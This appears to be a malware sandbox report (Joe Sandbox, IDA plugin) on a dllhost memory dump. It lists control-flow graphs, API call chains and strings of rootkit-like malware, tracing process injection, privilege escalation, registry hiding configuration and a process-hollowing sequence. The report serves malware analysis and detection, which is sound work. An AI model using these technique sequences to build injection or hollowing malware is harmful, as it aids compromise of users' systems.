control_flow_graph 48 140001868-1400018aa OpenProcess 49 140001cd1-140001ced 48->49 50 1400018b0-1400018c5 IsWow64Process 48->50 51 1400018d5 50->51 52 1400018c7-1400018d3 50->52 53 1400018db-1400018e7 CloseHandle 51->53 52->53 53->49 54 1400018ed-1400018f8 53->54 54->49 55 1400018fe-140001913 54->55 56 140001925 55->56 57 140001915-14000191a 55->57 59 140001927-140001929 56->59 57->49 58 140001920-140001923 57->58 58->59 59->49 60 14000192f-140001945 OpenProcess 59->60 60->49 61 14000194b-140001964 OpenProcess 60->61 62 140001a04-140001a23 NtQueryInformationProcess 61->62 63 14000196a-140001981 K32GetModuleFileNameExW 61->63 64 140001cc8-140001ccb CloseHandle 62->64 65 140001a29-140001a2d 62->65 66 1400019b3-1400019bf CloseHandle 63->66 67 140001983-14000199e PathFindFileNameW lstrlenW 63->67 64->49 65->64 69 140001a33-140001a4b OpenProcessToken 65->69 66->62 68 1400019c1-1400019db 66->68 67->66 70 1400019a0-1400019b0 StrCpyW 67->70 71 1400019e0-1400019f2 StrCmpIW 68->71 69->64 72 140001a51-140001a77 GetTokenInformation 69->72 70->66 71->64 73 1400019f8-140001a02 71->73 74 140001af4 72->74 75 140001a79-140001a82 GetLastError 72->75 73->62 73->71 77 140001afb-140001b09 CloseHandle 74->77 75->74 76 140001a84-140001a98 LocalAlloc 75->76 76->74 78 140001a9a-140001ac0 GetTokenInformation 76->78 77->64 79 140001b0f-140001b16 77->79 81 140001ae2 78->81 82 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 78->82 79->64 80 140001b1c-140001b27 79->80 80->64 83 140001b2d-140001b37 80->83 84 140001ae9-140001af2 LocalFree 81->84 82->84 85 140001b52 83->85 86 140001b39-140001b43 83->86 84->77 88 140001b56-140001b8e call 1400029a4 * 3 85->88 86->64 87 140001b49-140001b50 86->87 87->88 88->64 95 140001b94-140001bb4 call 1400029a4 StrStrA 88->95 98 140001bb6-140001bc6 95->98 99 140001bcd-140001bf2 call 1400029a4 * 2 95->99 98->95 100 140001bc8 98->100 99->64 105 140001bf8-140001c21 VirtualAllocEx 99->105 100->64 105->64 106 140001c27-140001c40 WriteProcessMemory 105->106 106->64 107 140001c46-140001c68 call 140002bfc 106->107 107->64 110 140001c6a-140001c72 107->110 110->64 111 140001c74-140001c81 WaitForSingleObject 110->111 112 140001c83-140001c97 GetExitCodeThread 111->112 113 140001cbd-140001cc2 CloseHandle 111->113 114 140001ca2-140001cbb VirtualFreeEx 112->114 115 140001c99-140001c9f 112->115 113->64 114->113 115->114
APIs
Strings
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
• String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
• API String ID: 2456419452-2628171563
• Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
• Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
• Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
• Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
• String ID:
• API String ID: 4084875642-0
• Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
• Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
• Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
• Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
• String ID:
• API String ID: 3197395349-0
• Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
• Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
• Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
• Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
• String ID: .text$C:\Windows\System32\
• API String ID: 2721474350-832442975
• Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
• Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
• Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
• Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
• String ID: M$\\.\pipe\$rbx-childproc
• API String ID: 2203880229-2840927681
• Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
• Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
• Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
• Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 160 140002cb0-140002cba 161 140002cbd-140002cd0 call 140002300 160->161 164 140002cd2-140002cdb Sleep 161->164 165 140002cdd-140002cea ConnectNamedPipe 161->165 164->161 166 140002d21-140002d26 Sleep 165->166 167 140002cec-140002d0d ReadFile 165->167 168 140002d2c-140002d35 DisconnectNamedPipe 166->168 167->168 169 140002d0f-140002d14 167->169 168->165 169->168 170 140002d16-140002d1f 169->170 170->168
APIs
Strings
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
• String ID: \\.\pipe\$rbx-control
• API String ID: 2071455217-3647231676
• Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
• Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
• Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
• Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3676546796-0
                                                                                                                                                          • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                                                                                                                                                          • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                                                                                                                                          • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1323846700-0
                                                                                                                                                          • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                                                                                                                                          • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                                                                                                                                            • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                                                                                                                                            • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                                                                                                                                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3805535264-0
                                                                                                                                                          • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                                                                                                                          • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                                                                                                                                                          • API String ID: 4225498131-1538754800
                                                                                                                                                          • Opcode ID: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                                                                                                                                                          • Opcode Fuzzy Hash: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                                                                                                                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                                                                                                                          • API String ID: 1036100660-1371749706

Control-flow Graph

Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436

Control-flow Graph

Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
• String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 3993315683-3414887735
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
• String ID:
• API String ID: 4184240511-0
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Delete$CloseEnumOpen
• String ID: SOFTWARE\$rbx-config
• API String ID: 3013565938-3990243012
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: ntdll.dll
• API String ID: 1646373207-2227199552
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
Memory Dump Source
• Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                                                                                                                                          • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

Execution Graph

Execution Coverage: 14.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 217
Total number of Limit Nodes: 13

Execution graph (the rendered graph is not reproduced; the API chains below are read directly from the graph's node labels and edges, with function addresses as they appear in the dllhost memory dump, and "N API calls" marking a collapsed sub-call):

• 1400031c4 → 140001868: OpenProcess → IsWow64Process → CloseHandle → OpenProcess → OpenProcess → K32GetModuleFileNameExW → PathFindFileNameW, lstrlenW → StrCpyW → CloseHandle → StrCmpIW (looped over candidates) → NtQueryInformationProcess → OpenProcessToken → GetTokenInformation → GetLastError → LocalAlloc → GetTokenInformation → GetSidSubAuthorityCount, GetSidSubAuthority → LocalFree → CloseHandle → StrStrA → VirtualAllocEx → WriteProcessMemory → 140002bfc → 1400020cc: GetModuleHandleA → GetProcAddress. The target process is opened, its image name and token SID are checked, and memory is allocated and written in it.

• 140003204: branches after ReadFile. 140003231 → ExitProcess, or 14000323d → RegOpenKeyExW → RegDeleteValueW ×3 → 14000217c (SysAllocString ×2, CoInitializeEx → CoInitializeSecurity → CoCreateInstance → VariantInit → CoUninitialize → SysFreeString ×2) → 140001f7c (GetProcessHeap, HeapAlloc → 140001cf0 (13 API calls) → 140001eec (5 API calls) → GetProcessHeap, HeapFree); or 140003246 → ReadFile → 140001868 (31 API calls) → 140001868 (31 API calls). 14000338b: GetProcessHeap, HeapAlloc, K32EnumProcesses → 1400033c9 → 140001868 (31 API calls), looped. 14000341d: ReadFile → GetProcessHeap, HeapAlloc → 140001cf0 (13 API calls) → 140003609 → 140001eec (OpenProcess → 140002bfc (2 API calls) → CloseHandle) or GetProcessHeap, HeapFree. 140003429: 140003534 → 1400020fc (ReadFile loop) → 1400020fc (ReadFile loop) → ShellExecuteW; 140003443 → 140002c5c → 1400020cc (2 API calls); 140003480 → 1400020fc (ReadFile loop) → ReadFile → GetProcessHeap, HeapAlloc, ReadFile → 140002434 (below) → 14000352f → GetProcessHeap, HeapFree; 14000358f → 140001f7c (22 API calls).

• 140002434 (dispatched from the unlabeled block 1400024ae): CreateProcessW; VirtualAllocEx → WriteProcessMemory → VirtualProtectEx (two copies); VirtualAlloc → GetThreadContext → WriteProcessMemory → SetThreadContext → ResumeThread; VirtualAlloc → Wow64GetThreadContext → WriteProcessMemory → Wow64SetThreadContext; OpenProcess → TerminateProcess; 1400020cc: GetModuleHandleA, GetProcAddress; two further VirtualProtectEx blocks. This is the canonical create-suspended, write, set-thread-context, resume hollowing sequence, present in both a native and a Wow64 variant.

